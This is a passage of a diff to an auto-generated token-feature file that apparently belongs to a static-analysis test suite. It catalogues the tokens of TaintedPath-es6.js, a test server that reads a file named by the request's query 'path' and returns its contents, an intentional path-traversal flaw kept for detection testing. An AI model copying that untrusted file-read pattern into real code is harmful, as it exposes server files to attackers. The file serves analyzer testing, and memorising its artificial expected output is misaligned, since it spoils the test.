autogenerated/TaintedPath/TaintedPath-es6.js:1:10:1:21 | readFileSync | contextFunctionInterfaces | | +| autogenerated/TaintedPath/TaintedPath-es6.js:1:10:1:21 | readFileSync | contextFunctionInterfaces | | +| autogenerated/TaintedPath/TaintedPath-es6.js:1:10:1:21 | readFileSync | contextFunctionInterfaces | | +| autogenerated/TaintedPath/TaintedPath-es6.js:1:10:1:21 | readFileSync | contextFunctionInterfaces | | +| autogenerated/TaintedPath/TaintedPath-es6.js:1:10:1:21 | readFileSync | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath-es6.js:1:10:1:21 | readFileSync | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath-es6.js:1:10:1:21 | readFileSync | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath-es6.js:1:10:1:21 | readFileSync | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath-es6.js:1:10:1:21 | readFileSync | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath-es6.js:1:10:1:21 | readFileSync | fileImports | fs http path url | +| autogenerated/TaintedPath/TaintedPath-es6.js:1:10:1:21 | readFileSync | fileImports | fs http path url | +| autogenerated/TaintedPath/TaintedPath-es6.js:1:10:1:21 | readFileSync | fileImports | fs http path url | +| autogenerated/TaintedPath/TaintedPath-es6.js:1:10:1:21 | readFileSync | fileImports | fs http path url | +| autogenerated/TaintedPath/TaintedPath-es6.js:1:30:1:33 | 'fs' | contextFunctionInterfaces | | +| autogenerated/TaintedPath/TaintedPath-es6.js:1:30:1:33 | 'fs' | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath-es6.js:1:30:1:33 | 'fs' | fileImports | fs http path url | +| autogenerated/TaintedPath/TaintedPath-es6.js:2:1:2:36 | import ... 'http'; | contextFunctionInterfaces | | +| autogenerated/TaintedPath/TaintedPath-es6.js:2:1:2:36 | import ... 'http'; | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath-es6.js:2:1:2:36 | import ... 'http'; | fileImports | fs http path url | +| autogenerated/TaintedPath/TaintedPath-es6.js:2:10:2:21 | createServer | contextFunctionInterfaces | | +| autogenerated/TaintedPath/TaintedPath-es6.js:2:10:2:21 | createServer | contextFunctionInterfaces | | +| autogenerated/TaintedPath/TaintedPath-es6.js:2:10:2:21 | createServer | contextFunctionInterfaces | | +| autogenerated/TaintedPath/TaintedPath-es6.js:2:10:2:21 | createServer | contextFunctionInterfaces | | +| autogenerated/TaintedPath/TaintedPath-es6.js:2:10:2:21 | createServer | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath-es6.js:2:10:2:21 | createServer | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath-es6.js:2:10:2:21 | createServer | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath-es6.js:2:10:2:21 | createServer | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath-es6.js:2:10:2:21 | createServer | fileImports | fs http path url | +| autogenerated/TaintedPath/TaintedPath-es6.js:2:10:2:21 | createServer | fileImports | fs http path url | +| autogenerated/TaintedPath/TaintedPath-es6.js:2:10:2:21 | createServer | fileImports | fs http path url | +| autogenerated/TaintedPath/TaintedPath-es6.js:2:10:2:21 | createServer | fileImports | fs http path url | +| autogenerated/TaintedPath/TaintedPath-es6.js:2:30:2:35 | 'http' | contextFunctionInterfaces | | +| autogenerated/TaintedPath/TaintedPath-es6.js:2:30:2:35 | 'http' | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath-es6.js:2:30:2:35 | 'http' | fileImports | fs http path url | +| autogenerated/TaintedPath/TaintedPath-es6.js:3:1:3:28 | import ... 'url'; | contextFunctionInterfaces | | +| autogenerated/TaintedPath/TaintedPath-es6.js:3:1:3:28 | import ... 'url'; | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath-es6.js:3:1:3:28 | import ... 'url'; | fileImports | fs http path url | +| autogenerated/TaintedPath/TaintedPath-es6.js:3:10:3:14 | parse | contextFunctionInterfaces | | +| autogenerated/TaintedPath/TaintedPath-es6.js:3:10:3:14 | parse | contextFunctionInterfaces | | +| autogenerated/TaintedPath/TaintedPath-es6.js:3:10:3:14 | parse | contextFunctionInterfaces | | +| autogenerated/TaintedPath/TaintedPath-es6.js:3:10:3:14 | parse | contextFunctionInterfaces | | +| autogenerated/TaintedPath/TaintedPath-es6.js:3:10:3:14 | parse | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath-es6.js:3:10:3:14 | parse | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath-es6.js:3:10:3:14 | parse | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath-es6.js:3:10:3:14 | parse | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath-es6.js:3:10:3:14 | parse | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath-es6.js:3:10:3:14 | parse | fileImports | fs http path url | +| autogenerated/TaintedPath/TaintedPath-es6.js:3:10:3:14 | parse | fileImports | fs http path url | +| autogenerated/TaintedPath/TaintedPath-es6.js:3:10:3:14 | parse | fileImports | fs http path url | +| autogenerated/TaintedPath/TaintedPath-es6.js:3:10:3:14 | parse | fileImports | fs http path url | +| autogenerated/TaintedPath/TaintedPath-es6.js:3:23:3:27 | 'url' | contextFunctionInterfaces | | +| autogenerated/TaintedPath/TaintedPath-es6.js:3:23:3:27 | 'url' | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath-es6.js:3:23:3:27 | 'url' | fileImports | fs http path url | +| autogenerated/TaintedPath/TaintedPath-es6.js:4:1:4:28 | import ... 'path'; | contextFunctionInterfaces | | +| autogenerated/TaintedPath/TaintedPath-es6.js:4:1:4:28 | import ... 'path'; | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath-es6.js:4:1:4:28 | import ... 'path'; | fileImports | fs http path url | +| autogenerated/TaintedPath/TaintedPath-es6.js:4:10:4:13 | join | contextFunctionInterfaces | | +| autogenerated/TaintedPath/TaintedPath-es6.js:4:10:4:13 | join | contextFunctionInterfaces | | +| autogenerated/TaintedPath/TaintedPath-es6.js:4:10:4:13 | join | contextFunctionInterfaces | | +| autogenerated/TaintedPath/TaintedPath-es6.js:4:10:4:13 | join | contextFunctionInterfaces | | +| autogenerated/TaintedPath/TaintedPath-es6.js:4:10:4:13 | join | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath-es6.js:4:10:4:13 | join | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath-es6.js:4:10:4:13 | join | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath-es6.js:4:10:4:13 | join | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath-es6.js:4:10:4:13 | join | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath-es6.js:4:10:4:13 | join | fileImports | fs http path url | +| autogenerated/TaintedPath/TaintedPath-es6.js:4:10:4:13 | join | fileImports | fs http path url | +| autogenerated/TaintedPath/TaintedPath-es6.js:4:10:4:13 | join | fileImports | fs http path url | +| autogenerated/TaintedPath/TaintedPath-es6.js:4:10:4:13 | join | fileImports | fs http path url | +| autogenerated/TaintedPath/TaintedPath-es6.js:4:22:4:27 | 'path' | contextFunctionInterfaces | | +| autogenerated/TaintedPath/TaintedPath-es6.js:4:22:4:27 | 'path' | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath-es6.js:4:22:4:27 | 'path' | fileImports | fs http path url | +| autogenerated/TaintedPath/TaintedPath-es6.js:6:5:6:10 | server | contextFunctionInterfaces | | +| autogenerated/TaintedPath/TaintedPath-es6.js:6:5:6:10 | server | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath-es6.js:6:5:6:10 | server | fileImports | fs http path url | +| autogenerated/TaintedPath/TaintedPath-es6.js:6:5:11:2 | server ... )));\\n}) | contextFunctionInterfaces | | +| autogenerated/TaintedPath/TaintedPath-es6.js:6:5:11:2 | server ... )));\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath-es6.js:6:5:11:2 | server ... )));\\n}) | fileImports | fs http path url | +| autogenerated/TaintedPath/TaintedPath-es6.js:6:14:6:25 | createServer | contextFunctionInterfaces | | +| autogenerated/TaintedPath/TaintedPath-es6.js:6:14:6:25 | createServer | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath-es6.js:6:14:6:25 | createServer | fileImports | fs http path url | +| autogenerated/TaintedPath/TaintedPath-es6.js:6:14:11:2 | createS ... )));\\n}) | contextFunctionInterfaces | | +| autogenerated/TaintedPath/TaintedPath-es6.js:6:14:11:2 | createS ... )));\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath-es6.js:6:14:11:2 | createS ... )));\\n}) | fileImports | fs http path url | +| autogenerated/TaintedPath/TaintedPath-es6.js:6:14:11:2 | exceptional return of createS ... )));\\n}) | contextFunctionInterfaces | | +| autogenerated/TaintedPath/TaintedPath-es6.js:6:14:11:2 | exceptional return of createS ... )));\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath-es6.js:6:14:11:2 | exceptional return of createS ... )));\\n}) | fileImports | fs http path url | +| autogenerated/TaintedPath/TaintedPath-es6.js:6:27:6:26 | join | contextFunctionInterfaces | | +| autogenerated/TaintedPath/TaintedPath-es6.js:6:27:6:26 | join | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath-es6.js:6:27:6:26 | join | enclosingFunctionBody | req res path parse req url true query path res write readFileSync join public path | +| autogenerated/TaintedPath/TaintedPath-es6.js:6:27:6:26 | join | enclosingFunctionName | createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath-es6.js:6:27:6:26 | join | fileImports | fs http path url | +| autogenerated/TaintedPath/TaintedPath-es6.js:6:27:6:26 | parse | contextFunctionInterfaces | | +| autogenerated/TaintedPath/TaintedPath-es6.js:6:27:6:26 | parse | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath-es6.js:6:27:6:26 | parse | enclosingFunctionBody | req res path parse req url true query path res write readFileSync join public path | +| autogenerated/TaintedPath/TaintedPath-es6.js:6:27:6:26 | parse | enclosingFunctionName | createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath-es6.js:6:27:6:26 | parse | fileImports | fs http path url | +| autogenerated/TaintedPath/TaintedPath-es6.js:6:27:6:26 | readFileSync | contextFunctionInterfaces | | +| autogenerated/TaintedPath/TaintedPath-es6.js:6:27:6:26 | readFileSync | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath-es6.js:6:27:6:26 | readFileSync | enclosingFunctionBody | req res path parse req url true query path res write readFileSync join public path | +| autogenerated/TaintedPath/TaintedPath-es6.js:6:27:6:26 | readFileSync | enclosingFunctionName | createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath-es6.js:6:27:6:26 | readFileSync | fileImports | fs http path url | +| autogenerated/TaintedPath/TaintedPath-es6.js:6:27:6:26 | this | contextFunctionInterfaces | | +| autogenerated/TaintedPath/TaintedPath-es6.js:6:27:6:26 | this | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath-es6.js:6:27:6:26 | this | enclosingFunctionBody | req res path parse req url true query path res write readFileSync join public path | +| autogenerated/TaintedPath/TaintedPath-es6.js:6:27:6:26 | this | enclosingFunctionName | createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath-es6.js:6:27:6:26 | this | fileImports | fs http path url | +| autogenerated/TaintedPath/TaintedPath-es6.js:6:27:11:1 | 'arguments' object of anonymous function | contextFunctionInterfaces | | +| autogenerated/TaintedPath/TaintedPath-es6.js:6:27:11:1 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath-es6.js:6:27:11:1 | 'arguments' object of anonymous function | enclosingFunctionBody | req res path parse req url true query path res write readFileSync join public path | +| autogenerated/TaintedPath/TaintedPath-es6.js:6:27:11:1 | 'arguments' object of anonymous function | enclosingFunctionName | createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath-es6.js:6:27:11:1 | 'arguments' object of anonymous function | fileImports | fs http path url | +| autogenerated/TaintedPath/TaintedPath-es6.js:6:27:11:1 | exceptional return of anonymous function | contextFunctionInterfaces | | +| autogenerated/TaintedPath/TaintedPath-es6.js:6:27:11:1 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath-es6.js:6:27:11:1 | exceptional return of anonymous function | enclosingFunctionBody | req res path parse req url true query path res write readFileSync join public path | +| autogenerated/TaintedPath/TaintedPath-es6.js:6:27:11:1 | exceptional return of anonymous function | enclosingFunctionName | createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath-es6.js:6:27:11:1 | exceptional return of anonymous function | fileImports | fs http path url | | autogenerated/TaintedPath/TaintedPath-es6.js:6:27:11:1 | functio ... h)));\\n} | CalleeFlexibleAccessPath | createServer | | autogenerated/TaintedPath/TaintedPath-es6.js:6:27:11:1 | functio ... h)));\\n} | InputArgumentIndex | 0 | | autogenerated/TaintedPath/TaintedPath-es6.js:6:27:11:1 | functio ... h)));\\n} | calleeImports | http | | autogenerated/TaintedPath/TaintedPath-es6.js:6:27:11:1 | functio ... h)));\\n} | contextFunctionInterfaces | | | autogenerated/TaintedPath/TaintedPath-es6.js:6:27:11:1 | functio ... h)));\\n} | contextSurroundingFunctionParameters | (req, res) | | autogenerated/TaintedPath/TaintedPath-es6.js:6:27:11:1 | functio ... h)));\\n} | fileImports | fs http path url | +| autogenerated/TaintedPath/TaintedPath-es6.js:6:27:11:1 | return of anonymous function | contextFunctionInterfaces | | +| autogenerated/TaintedPath/TaintedPath-es6.js:6:27:11:1 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath-es6.js:6:27:11:1 | return of anonymous function | enclosingFunctionBody | req res path parse req url true query path res write readFileSync join public path | +| autogenerated/TaintedPath/TaintedPath-es6.js:6:27:11:1 | return of anonymous function | enclosingFunctionName | createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath-es6.js:6:27:11:1 | return of anonymous function | fileImports | fs http path url | +| autogenerated/TaintedPath/TaintedPath-es6.js:6:36:6:38 | req | contextFunctionInterfaces | | +| autogenerated/TaintedPath/TaintedPath-es6.js:6:36:6:38 | req | contextFunctionInterfaces | | +| autogenerated/TaintedPath/TaintedPath-es6.js:6:36:6:38 | req | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath-es6.js:6:36:6:38 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath-es6.js:6:36:6:38 | req | enclosingFunctionBody | req res path parse req url true query path res write readFileSync join public path | +| autogenerated/TaintedPath/TaintedPath-es6.js:6:36:6:38 | req | enclosingFunctionBody | req res path parse req url true query path res write readFileSync join public path | +| autogenerated/TaintedPath/TaintedPath-es6.js:6:36:6:38 | req | enclosingFunctionName | createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath-es6.js:6:36:6:38 | req | enclosingFunctionName | createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath-es6.js:6:36:6:38 | req | fileImports | fs http path url | +| autogenerated/TaintedPath/TaintedPath-es6.js:6:36:6:38 | req | fileImports | fs http path url | +| autogenerated/TaintedPath/TaintedPath-es6.js:6:41:6:43 | res | contextFunctionInterfaces | | +| autogenerated/TaintedPath/TaintedPath-es6.js:6:41:6:43 | res | contextFunctionInterfaces | | +| autogenerated/TaintedPath/TaintedPath-es6.js:6:41:6:43 | res | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath-es6.js:6:41:6:43 | res | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath-es6.js:6:41:6:43 | res | enclosingFunctionBody | req res path parse req url true query path res write readFileSync join public path | +| autogenerated/TaintedPath/TaintedPath-es6.js:6:41:6:43 | res | enclosingFunctionBody | req res path parse req url true query path res write readFileSync join public path | +| autogenerated/TaintedPath/TaintedPath-es6.js:6:41:6:43 | res | enclosingFunctionName | createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath-es6.js:6:41:6:43 | res | enclosingFunctionName | createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath-es6.js:6:41:6:43 | res | fileImports | fs http path url | +| autogenerated/TaintedPath/TaintedPath-es6.js:6:41:6:43 | res | fileImports | fs http path url | +| autogenerated/TaintedPath/TaintedPath-es6.js:7:7:7:10 | path | contextFunctionInterfaces | | +| autogenerated/TaintedPath/TaintedPath-es6.js:7:7:7:10 | path | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath-es6.js:7:7:7:10 | path | enclosingFunctionBody | req res path parse req url true query path res write readFileSync join public path | +| autogenerated/TaintedPath/TaintedPath-es6.js:7:7:7:10 | path | enclosingFunctionName | createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath-es6.js:7:7:7:10 | path | fileImports | fs http path url | +| autogenerated/TaintedPath/TaintedPath-es6.js:7:7:7:44 | path | contextFunctionInterfaces | | +| autogenerated/TaintedPath/TaintedPath-es6.js:7:7:7:44 | path | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath-es6.js:7:7:7:44 | path | enclosingFunctionBody | req res path parse req url true query path res write readFileSync join public path | +| autogenerated/TaintedPath/TaintedPath-es6.js:7:7:7:44 | path | enclosingFunctionName | createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath-es6.js:7:7:7:44 | path | fileImports | fs http path url | +| autogenerated/TaintedPath/TaintedPath-es6.js:7:7:7:44 | path = ... ry.path | contextFunctionInterfaces | | +| autogenerated/TaintedPath/TaintedPath-es6.js:7:7:7:44 | path = ... ry.path | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath-es6.js:7:7:7:44 | path = ... ry.path | enclosingFunctionBody | req res path parse req url true query path res write readFileSync join public path | +| autogenerated/TaintedPath/TaintedPath-es6.js:7:7:7:44 | path = ... ry.path | enclosingFunctionName | createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath-es6.js:7:7:7:44 | path = ... ry.path | fileImports | fs http path url | +| autogenerated/TaintedPath/TaintedPath-es6.js:7:14:7:18 | parse | contextFunctionInterfaces | | +| autogenerated/TaintedPath/TaintedPath-es6.js:7:14:7:18 | parse | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath-es6.js:7:14:7:18 | parse | enclosingFunctionBody | req res path parse req url true query path res write readFileSync join public path | +| autogenerated/TaintedPath/TaintedPath-es6.js:7:14:7:18 | parse | enclosingFunctionName | createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath-es6.js:7:14:7:18 | parse | fileImports | fs http path url | +| autogenerated/TaintedPath/TaintedPath-es6.js:7:14:7:33 | exceptional return of parse(req.url, true) | contextFunctionInterfaces | | +| autogenerated/TaintedPath/TaintedPath-es6.js:7:14:7:33 | exceptional return of parse(req.url, true) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath-es6.js:7:14:7:33 | exceptional return of parse(req.url, true) | enclosingFunctionBody | req res path parse req url true query path res write readFileSync join public path | +| autogenerated/TaintedPath/TaintedPath-es6.js:7:14:7:33 | exceptional return of parse(req.url, true) | enclosingFunctionName | createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath-es6.js:7:14:7:33 | exceptional return of parse(req.url, true) | fileImports | fs http path url | +| autogenerated/TaintedPath/TaintedPath-es6.js:7:14:7:33 | parse(req.url, true) | contextFunctionInterfaces | | +| autogenerated/TaintedPath/TaintedPath-es6.js:7:14:7:33 | parse(req.url, true) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath-es6.js:7:14:7:33 | parse(req.url, true) | enclosingFunctionBody | req res path parse req url true query path res write readFileSync join public path | +| autogenerated/TaintedPath/TaintedPath-es6.js:7:14:7:33 | parse(req.url, true) | enclosingFunctionName | createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath-es6.js:7:14:7:33 | parse(req.url, true) | fileImports | fs http path url | +| autogenerated/TaintedPath/TaintedPath-es6.js:7:14:7:39 | parse(r ... ).query | contextFunctionInterfaces | | +| autogenerated/TaintedPath/TaintedPath-es6.js:7:14:7:39 | parse(r ... ).query | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath-es6.js:7:14:7:39 | parse(r ... ).query | enclosingFunctionBody | req res path parse req url true query path res write readFileSync join public path | +| autogenerated/TaintedPath/TaintedPath-es6.js:7:14:7:39 | parse(r ... ).query | enclosingFunctionName | createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath-es6.js:7:14:7:39 | parse(r ... ).query | fileImports | fs http path url | +| autogenerated/TaintedPath/TaintedPath-es6.js:7:14:7:44 | parse(r ... ry.path | contextFunctionInterfaces | | +| autogenerated/TaintedPath/TaintedPath-es6.js:7:14:7:44 | parse(r ... ry.path | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath-es6.js:7:14:7:44 | parse(r ... ry.path | enclosingFunctionBody | req res path parse req url true query path res write readFileSync join public path | +| autogenerated/TaintedPath/TaintedPath-es6.js:7:14:7:44 | parse(r ... ry.path | enclosingFunctionName | createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath-es6.js:7:14:7:44 | parse(r ... ry.path | fileImports | fs http path url | +| autogenerated/TaintedPath/TaintedPath-es6.js:7:20:7:22 | req | contextFunctionInterfaces | | +| autogenerated/TaintedPath/TaintedPath-es6.js:7:20:7:22 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath-es6.js:7:20:7:22 | req | enclosingFunctionBody | req res path parse req url true query path res write readFileSync join public path | +| autogenerated/TaintedPath/TaintedPath-es6.js:7:20:7:22 | req | enclosingFunctionName | createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath-es6.js:7:20:7:22 | req | fileImports | fs http path url | | autogenerated/TaintedPath/TaintedPath-es6.js:7:20:7:26 | req.url | CalleeFlexibleAccessPath | parse | | autogenerated/TaintedPath/TaintedPath-es6.js:7:20:7:26 | req.url | InputArgumentIndex | 0 | | autogenerated/TaintedPath/TaintedPath-es6.js:7:20:7:26 | req.url | calleeImports | url | @@ -4604,6 +57887,11 @@ tokenFeatures | autogenerated/TaintedPath/TaintedPath-es6.js:7:20:7:26 | req.url | enclosingFunctionBody | req res path parse req url true query path res write readFileSync join public path | | autogenerated/TaintedPath/TaintedPath-es6.js:7:20:7:26 | req.url | enclosingFunctionName | createServer#functionalargument | | autogenerated/TaintedPath/TaintedPath-es6.js:7:20:7:26 | req.url | fileImports | fs http path url | +| autogenerated/TaintedPath/TaintedPath-es6.js:7:24:7:26 | url | contextFunctionInterfaces | | +| autogenerated/TaintedPath/TaintedPath-es6.js:7:24:7:26 | url | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath-es6.js:7:24:7:26 | url | enclosingFunctionBody | req res path parse req url true query path res write readFileSync join public path | +| autogenerated/TaintedPath/TaintedPath-es6.js:7:24:7:26 | url | enclosingFunctionName | createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath-es6.js:7:24:7:26 | url | fileImports | fs http path url | | autogenerated/TaintedPath/TaintedPath-es6.js:7:29:7:32 | true | CalleeFlexibleAccessPath | parse | | autogenerated/TaintedPath/TaintedPath-es6.js:7:29:7:32 | true | InputArgumentIndex | 1 | | autogenerated/TaintedPath/TaintedPath-es6.js:7:29:7:32 | true | calleeImports | url | @@ -4612,6 +57900,51 @@ tokenFeatures | autogenerated/TaintedPath/TaintedPath-es6.js:7:29:7:32 | true | enclosingFunctionBody | req res path parse req url true query path res write readFileSync join public path | | autogenerated/TaintedPath/TaintedPath-es6.js:7:29:7:32 | true | enclosingFunctionName | createServer#functionalargument | | autogenerated/TaintedPath/TaintedPath-es6.js:7:29:7:32 | true | fileImports | fs http path url | +| autogenerated/TaintedPath/TaintedPath-es6.js:7:35:7:39 | query | contextFunctionInterfaces | | +| autogenerated/TaintedPath/TaintedPath-es6.js:7:35:7:39 | query | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath-es6.js:7:35:7:39 | query | enclosingFunctionBody | req res path parse req url true query path res write readFileSync join public path | +| autogenerated/TaintedPath/TaintedPath-es6.js:7:35:7:39 | query | enclosingFunctionName | createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath-es6.js:7:35:7:39 | query | fileImports | fs http path url | +| autogenerated/TaintedPath/TaintedPath-es6.js:7:41:7:44 | path | contextFunctionInterfaces | | +| autogenerated/TaintedPath/TaintedPath-es6.js:7:41:7:44 | path | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath-es6.js:7:41:7:44 | path | enclosingFunctionBody | req res path parse req url true query path res write readFileSync join public path | +| autogenerated/TaintedPath/TaintedPath-es6.js:7:41:7:44 | path | enclosingFunctionName | createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath-es6.js:7:41:7:44 | path | fileImports | fs http path url | +| autogenerated/TaintedPath/TaintedPath-es6.js:10:3:10:5 | res | contextFunctionInterfaces | | +| autogenerated/TaintedPath/TaintedPath-es6.js:10:3:10:5 | res | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath-es6.js:10:3:10:5 | res | enclosingFunctionBody | req res path parse req url true query path res write readFileSync join public path | +| autogenerated/TaintedPath/TaintedPath-es6.js:10:3:10:5 | res | enclosingFunctionName | createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath-es6.js:10:3:10:5 | res | fileImports | fs http path url | +| autogenerated/TaintedPath/TaintedPath-es6.js:10:3:10:11 | res.write | contextFunctionInterfaces | | +| autogenerated/TaintedPath/TaintedPath-es6.js:10:3:10:11 | res.write | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath-es6.js:10:3:10:11 | res.write | enclosingFunctionBody | req res path parse req url true query path res write readFileSync join public path | +| autogenerated/TaintedPath/TaintedPath-es6.js:10:3:10:11 | res.write | enclosingFunctionName | createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath-es6.js:10:3:10:11 | res.write | fileImports | fs http path url | +| autogenerated/TaintedPath/TaintedPath-es6.js:10:3:10:47 | exceptional return of res.wri ... path))) | contextFunctionInterfaces | | +| autogenerated/TaintedPath/TaintedPath-es6.js:10:3:10:47 | exceptional return of res.wri ... path))) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath-es6.js:10:3:10:47 | exceptional return of res.wri ... path))) | enclosingFunctionBody | req res path parse req url true query path res write readFileSync join public path | +| autogenerated/TaintedPath/TaintedPath-es6.js:10:3:10:47 | exceptional return of res.wri ... path))) | enclosingFunctionName | createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath-es6.js:10:3:10:47 | exceptional return of res.wri ... path))) | fileImports | fs http path url | +| autogenerated/TaintedPath/TaintedPath-es6.js:10:3:10:47 | res.wri ... path))) | contextFunctionInterfaces | | +| autogenerated/TaintedPath/TaintedPath-es6.js:10:3:10:47 | res.wri ... path))) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath-es6.js:10:3:10:47 | res.wri ... path))) | enclosingFunctionBody | req res path parse req url true query path res write readFileSync join public path | +| autogenerated/TaintedPath/TaintedPath-es6.js:10:3:10:47 | res.wri ... path))) | enclosingFunctionName | createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath-es6.js:10:3:10:47 | res.wri ... path))) | fileImports | fs http path url | +| autogenerated/TaintedPath/TaintedPath-es6.js:10:7:10:11 | write | contextFunctionInterfaces | | +| autogenerated/TaintedPath/TaintedPath-es6.js:10:7:10:11 | write | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath-es6.js:10:7:10:11 | write | enclosingFunctionBody | req res path parse req url true query path res write readFileSync join public path | +| autogenerated/TaintedPath/TaintedPath-es6.js:10:7:10:11 | write | enclosingFunctionName | createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath-es6.js:10:7:10:11 | write | fileImports | fs http path url | +| autogenerated/TaintedPath/TaintedPath-es6.js:10:13:10:24 | readFileSync | contextFunctionInterfaces | | +| autogenerated/TaintedPath/TaintedPath-es6.js:10:13:10:24 | readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath-es6.js:10:13:10:24 | readFileSync | enclosingFunctionBody | req res path parse req url true query path res write readFileSync join public path | +| autogenerated/TaintedPath/TaintedPath-es6.js:10:13:10:24 | readFileSync | enclosingFunctionName | createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath-es6.js:10:13:10:24 | readFileSync | fileImports | fs http path url | +| autogenerated/TaintedPath/TaintedPath-es6.js:10:13:10:46 | exceptional return of readFil ... path)) | contextFunctionInterfaces | | +| autogenerated/TaintedPath/TaintedPath-es6.js:10:13:10:46 | exceptional return of readFil ... path)) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath-es6.js:10:13:10:46 | exceptional return of readFil ... path)) | enclosingFunctionBody | req res path parse req url true query path res write readFileSync join public path | +| autogenerated/TaintedPath/TaintedPath-es6.js:10:13:10:46 | exceptional return of readFil ... path)) | enclosingFunctionName | createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath-es6.js:10:13:10:46 | exceptional return of readFil ... path)) | fileImports | 